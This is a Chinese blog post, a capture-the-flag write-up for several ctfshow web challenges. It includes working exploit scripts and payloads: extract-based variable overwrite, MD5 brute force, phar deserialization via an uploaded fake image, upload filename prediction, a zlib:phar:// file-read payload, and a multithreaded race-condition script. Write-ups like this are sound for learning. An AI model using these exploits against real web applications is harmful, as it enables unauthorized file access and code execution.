ctfshow 大吉大利杯

于 2022-12-08 18:07:27 发布
阅读量761 收藏 2
点赞数
分类专栏: ctfshow 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/128241441
版权

veryphp

看着思路很简单,就是利用post传参和extract函数来给需要的参数赋值,再利用call_user_func调用qwq中的oao静态方法。

感觉最麻烦的就是

preg_match('/^\-[a-e][^a-zA-Z0-8]<b>(.*)>{4}\D*?(abc.*?)p(hp)*\@R(s|r).$/', $shaw_root)

这个正则函数的绕过,传入的一串字符串需要匹配上。

在线网站:regex101: build, test, and debug regex

尝试了一会后得到一串字符:

-a9<b>11111111>>>>aabcphp@Rr2

然后还要绕过_,可以用空格或者[替代。

POST传入:shaw[root=-a9<b>11111111>>>>aabcphp@Rr2

得到

md5("shaw".($SecretNumber)."root")==166b47a5cb1ca2431a0edfcef200684f&nbsp;&amp;&amp;&nbsp;strlen($SecretNumber)===5

很明显SecretNumber是一个长度为5的数字,爆破出来就好:

<?php
for($i=10000;$i<=99999;$i++)
{
    if(md5("shaw".($i)."root")=='166b47a5cb1ca2431a0edfcef200684f'){
        echo $i;
    }
}

最后的payload:

shaw[root=-a9<b>11111111>>>>aabcphp@Rr2&ans=21475&my[ans=qwq::oao

image-20221208161413441

虎山行

这个题出的有意思,写了好一会。

先访问www.rar下载源码。

Seay自动审计一下,发现33处有问题,一个一个看一下。

image-20221208161745296

在这个地方参数完全可控,后缀也没有.dat,存在任意文件读取漏洞。

访问一下,但没成功,应该是需要成为管理员。

在install.php中发现管理员信息

image-20221208162134986

然后利用漏洞读取一下flag

image-20221208162317866

访问一下ctfshowsecretfilehh

image-20221208162417010

image-20221208162622923

之前看到过文件上传页面,可以上传jpg、png、gif文件,所以可以利用phar反序列化来得到hint.txt。

<?php
class Ctfshow{
    public $ctfer = 'shower';
}
  $a=new Ctfshow();
  $phar = new Phar('phar.phar');
  $phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
  $phar->setMetadata($a);
  $phar->addFromString('test.txt','dky');
?>

然后改后缀为jpg,上传文件,但发现其并不回显文件名称,且文件名称被修改,所以去读取一下flag.php文件。

<?php
error_reporting(0);
// 允许上传的图片后缀
$allowedExts = array("gif", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
// echo $_FILES["file"]["size"];
$extension = end($temp);     // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 2048000)   // 小于 2000kb
&& in_array($extension, $allowedExts))
{
	if ($_FILES["file"]["error"] > 0)
	{
		echo "文件出错: " . $_FILES["file"]["error"] . "<br>";
	}
	else
	{
		if (file_exists("upload/" . $_FILES["file"]["name"]))
		{
			echo $_FILES["file"]["name"] . " 文件已经存在。 ";
		}
		else
		{
			$md5_unix_random =substr(md5(time()),0,8);
			$filename = $md5_unix_random.'.'.$extension;
            move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $filename);
            echo "上传成功,文件存在upload/";
		}
	}
}
else
{
	echo "文件类型仅支持jpg、png、gif等图片格式";
}
?>

写个文件上传脚本。

import requests
import time
import hashlib
def geturl(s):
    a = hashlib.md5(str(int(s)).encode()).hexdigest()
    filename = a[:8]
    return "http://d1166e35-8694-4820-a76b-c89ebbd7b475.challenge.ctf.show/upload/"+filename+'.jpg'
for i in range(50):
    url="http://d1166e35-8694-4820-a76b-c89ebbd7b475.challenge.ctf.show/upload.php"
    files={'file':('phar.jpg',open('phar.jpg','rb'),'image/jpeg')}
    re1=requests.post(url,files=files)
    a=time.time()
    re2=requests.get(geturl(a))
    if("我的网站" not in  re2.text):
        print(geturl(a))
        break

然后利用phar伪协议读取文件,利用zlib://协议绕过waf:

payload:

?file=zlib:phar:///var/www/html/upload/017ea83e.jpg

又是一个路由:

flag{fuckflag***}flag also not here You can access ctfshowgetflaghhhh directory

<?php
show_source(__FILE__);
$unser = $_GET['unser'];
class Unser {
    public $username='Firebasky';
    public $password;
    function __destruct() {
        if($this->username=='ctfshow'&&$this->password==(int)md5(time())){
            system('cp /ctfshow* /var/www/html/flag.txt');
        }
    }
}
$ctf=@unserialize($unser);
system('rm -rf /var/www/html/flag.txt');

利用条件竞争,在其system命令执行之前访问flag.txt文件,这次有了unserialize函数,不需要再上传文件。

import io
import requests
import threading
def write():
    while True:
        url="http://d1166e35-8694-4820-a76b-c89ebbd7b475.challenge.ctf.show/ctfshowgetflaghhhh/"
        resp = requests.get(url+'?unser=O:5:"Unser":2:{s:8:"username";s:7:"ctfshow";s:8:"password";i:0;}')
def read():
    while True:
        r=requests.get('http://d1166e35-8694-4820-a76b-c89ebbd7b475.challenge.ctf.show/flag.txt')
        if("我的网站" not in r.text):
            print(r.text)
            print('success!!!')
            event.clear()
            break;
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,20): 
            threading.Thread(target=write,args=()).start()
        for i in range(1,20):
            threading.Thread(target=read,args=()).start()
    event.set()

spaceman

非预期了,先看源码:

<?php
error_reporting(0);
highlight_file(__FILE__);
class spaceman
{
    public $username;
    public $password;
    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }
    public function __wakeup()
    {
        if($this->password==='ctfshowvip')
        {
            include("flag.php");
            echo $flag;    
        }
        else
        {
            echo 'wrong password';
        }
    }
}
function filter($string){
    return str_replace('ctfshowup','ctfshow',$string);
}
$str = file_get_contents("php://input");
if(preg_match('/\_|\.|\]|\[/is',$str)){            
    die("I am sorry but you have to leave.");
}else{
    extract($_POST);
}
$ser = filter(serialize(new spaceman($user_name,$pass_word)));
$test = unserialize($ser);
?>

本来这题应该是还有另外一个参数,利用这两个可控参数去字符逃逸,本想本地修改一下再做,但本地extract代码一直无法实现。

paylaod:

user name=1&pass word=ctfshowvip

虎山行’s revenge

改了个名字,直接还用之前的脚本即可。

import requests
import time
import hashlib
def geturl(s):
    a = hashlib.md5(str(int(s)).encode()).hexdigest()
    filename = a[:8]
    return "http://d1166e35-8694-4820-a76b-c89ebbd7b475.challenge.ctf.show/upload/"+filename+'.jpg'
for i in range(50):
    url="http://d1166e35-8694-4820-a76b-c89ebbd7b475.challenge.ctf.show/upload.php"
    files={'file':('phar.jpg',open('phar.jpg','rb'),'image/jpeg')}
    re1=requests.post(url,files=files)
    a=time.time()
    re2=requests.get(geturl(a))
    if("我的网站" not in  re2.text):
        print(geturl(a))
        break

payload:

?file=zlib:phar:///var/www/html/upload/f815a59f.jpg

import io
import requests
import threading
def write():
    while True:
        url="http://8722968c-5302-4bdf-863b-5ece18eddf38.challenge.ctf.show/hsxctfshowsecretgetflagl/"
        resp = requests.get(url+'?unser=O:5:"Unser":2:{s:8:"username";s:7:"ctfshow";s:8:"password";i:0;}')
def read():
    while True:
        r=requests.get('http://8722968c-5302-4bdf-863b-5ece18eddf38.challenge.ctf.show/flag.txt')
        if("我的网站" not in r.text):
            print(r.text)
            print('success!!!')
            event.clear()
            break;
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,20): 
            threading.Thread(target=write,args=()).start()
        for i in range(1,20):
            threading.Thread(target=read,args=()).start()
    event.set()
f0njl
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
新年快乐,大吉大利,烟花漫天
02-10
新年快乐代码特效2024 新年快乐,烟花漫天
ctfshow-DJBCTF-veryphp wp
博客地址 www.sec0nd.top
02-27 1115
ctfshow=DJBCTF-veryphp WP <?php error_reporting(0); highlight_file(__FILE__); include("config.php"); class qwq { function __wakeup(){ die("Access Denied!"); } static function oao(){ show_source("config.php"); } } $str = f
CTFshow DJBCTF MISC(大吉杯) WP
七月的博客
01-24 3186
只做了misc的菜鸡,来写写misc部分的writeup,狸神的FM到最后也看不懂,太难了呜呜呜。 十八般兵器 hint1:JPHS hint2:用Notepad++打开试试? hint3:前十种兵器对应10进制,后八种对应8进制 根据hint1,先利用JPHS将18张图片均解密一下,密码为空,每张图片解密后的数据末尾都有一段数字,这幅图是删掉了部分空格,实际需要往下拉。 根据题目的武器顺序,前十张图片的数字组合起来十进制转十六进制。后八张图片的数字组合起来八进制转十六进制,asc转码一下得到flag
CTFshow-大牛杯
i_kei的博客
01-22 1727
2021-1月23日大吉杯盛大开幕 比赛地址:https://ctf.show/challenges 比赛群号:372619038 无需报名:提前注册好账号即可 比赛态势直播间地址: https://live.bilibili.com/22405530
ctfshow--DJBCTF--spaceman复现
xiaolong22333的博客
02-01 220
<?php error_reporting(0); highlight_file(__FILE__); class spaceman { public $username; public $password; public function __construct($username,$password) { $this->username = $username; $this->password = $password;
CTFshow——DJBCTF(比赛记录之摸鱼的代价)
Npceer-一位网安初学者的博客
01-24 741
目录:没有(因为没怎么打,总共就写了几题) 这大吉杯挺不错的 就是我不行 我的水平 由于摸鱼等原因 与2个月前的HECTF 几乎没有变化 虽然我以为会有变化的 我都不敢说我是个web入门的萌新 这veryphp这么多写出来的 我看到一堆waf直接跑路了 MISC 也是在各种hint下 才能勉强切出几题 属实太菜了 我3个月的门 入的不如别人半个月 这个博客为了监督自己不摸鱼而记 也顺便记一下这几题misc 因为挺好玩的 我的签到!:手撕拼图yyds 第一次 照着群里大佬给的原图去拼 然后感觉时间不够直
CTFshow--DJBCTF(大吉大利杯) WEB--spaceman
volcano的博客
01-25 1047
师傅们出的MISC题做得有点上头,虽然最后也只做出来四题,web题也没来得及看。。。 源码: <?php error_reporting(0); highlight_file(__FILE__); class spaceman { public $username; public $password; public function __construct($username,$password) { $this->username = $use
CTFSHOW-大吉大利
打酱油的杯具的博客
02-01 1585
CTFSHOW-大吉大利杯 文章目录CTFSHOW-大吉大利杯十八般兵器请问大吉杯的签到是在这里签吗牛年大吉色图生成器 被血虐,又菜又无知,只做出了无脑的拼图(真-有手就行) 以下wp参考是Mumuzi大佬的wp,仅仅是做个复现,建议看大佬的原博客: https://blog.csdn.net/qq_42880719/article/details/113068933 十八般兵器 感谢@i_kei师傅供题 刀、枪、剑、戟、斧、钺、钩、叉、鞭、锏、锤、戈、镋、棍、槊、棒、矛、耙 hint1:JPHS hin
CTF.show:veryphp
qq_46230755的博客
01-28 488
先审计一下代码 <?php error_reporting(0); highlight_file(__FILE__); include("config.php"); class qwq { function __wakeup(){ die("Access Denied!"); } static function oao(){ show_source("config.php"); } } $str = file_get_contents("
ctfshow--DJBCTF--veryphp复现
xiaolong22333的博客
02-01 606
<?php error_reporting(0); highlight_file(__FILE__); include("config.php"); class qwq { function __wakeup(){ die("Access Denied!"); } static function oao(){ show_source("config.php"); } } $str = file_get_contents("php://in
跨年烟花代码,兔年吉祥,大吉大利~
01-09
跨年烟花代码 (0,5,24,1);">浏览器不支持canvas <div class="city"><img src="img/city.png" alt="" /> ;"/> 兔年吉祥 突飞猛进 阖家幸福 万事如意 心想事成 </div>
【祝福语】牛年春节大吉大利祝福语.doc
11-13
【祝福语】牛年春节大吉大利祝福语.doc
中国风剪纸狗年吉祥大吉大利个人工作总结PPT模板
11-24
这是一款中国风剪纸狗年吉祥大吉大利个人工作总结PPT模板,适用于年终工作回顾、自我评价、工作经验分享、明年工作规划等相关工作总结汇报PPT制作,欢迎大家下载参考!该文档为中国风剪纸狗年吉祥大吉大利个人工作...
违约用户风险预测+大吉大利今晚吃鸡+方案说明1
08-03
1.根据生日提取年龄 2.bank 表里的银行名称字段存在中英文混合 3.存在疑似用户多次贷款现象 1.删除缺失率高的特征 对于原始表里某些缺失比较高的特征,比
ctfshow虎山行+虎山行revenge
羽的博客
01-24 1246
代码审计在mc-admin/page-edit.php中存在任意文件包含漏洞 盲猜file=../../../../../../../flag去读flag得到提示地址 访问ctfshowsecretfilehh得到源码如下 <?php highlight_file(__FILE__); error_reporting(0); include('waf.php'); class Ctfshow{ public $ctfer = 'shower'; public function __
ctfshow-萌新(持续更新)
热门推荐
i_kei的博客
01-10 1万+
萌新认证 加入qq群:372619038 进群喊:萌新码 萌新_密码1 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 首先16进制转字符 发现一串base64编码的字符串,解密后得到栅栏加密的字符串 base64加密解密 栅栏解密后得到flag 萌新_密码2 出题人已累,随便敲了几下键盘。。。 rdcvbg 2qase3 6tgh
ctfshow大吉大利杯web wp
想变得强大,虽然现在还弱不禁风
01-26 624
这次的比赛web因为种种原因就做出两道。 不过也学到了东西。 有手就行 打开网页F12发现有这个东西,很明显是base64转图片,记得加上头 然后发现这么个东西 回看url 试一下?file=flag,又得到一串base64 得到一个小程序码,进去之后发现要点5700多万下。**加粗样式**发现鼠标连点器只能一秒100下,不现实。 网上搜了一下,发现微信小程序可以反编译。照着教程弄了一下,直接在反编译的文件里ctrl f 发现flag. spaceman 应该是非预期了 绕过下划线就行。 x
大吉杯--ctf.show
doudoudedi
01-25 473
easyrop 简单栈溢出,将返回地址写成ROP然后在data段布置shellcode跳过去执行即可,我写了2段估计有大师傅分分钟秒解开 from pwn import * context.terminal=['tmux','splitw','-h'] #p=process("./easyrop") p=remote("111.231.70.44",28092) offset=64 context.arch='amd64' sl=asm(shellcraft.sh()) shellcode=''' pop
python发红包代码
最新发布
04-18
以下是一个使用Python发送微信红包的示例代码: ```python import itchat itchat.auto_login() friend_list = itchat.get_friends(update=True) for friend in friend_list: if friend['RemarkName'] == '某某': # 填入好友备注名称 itchat.send('恭喜发财,大吉大利!', friend['UserName']) ``` 请注意,该代码仅为示例,实际使用需保证符合微信的规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值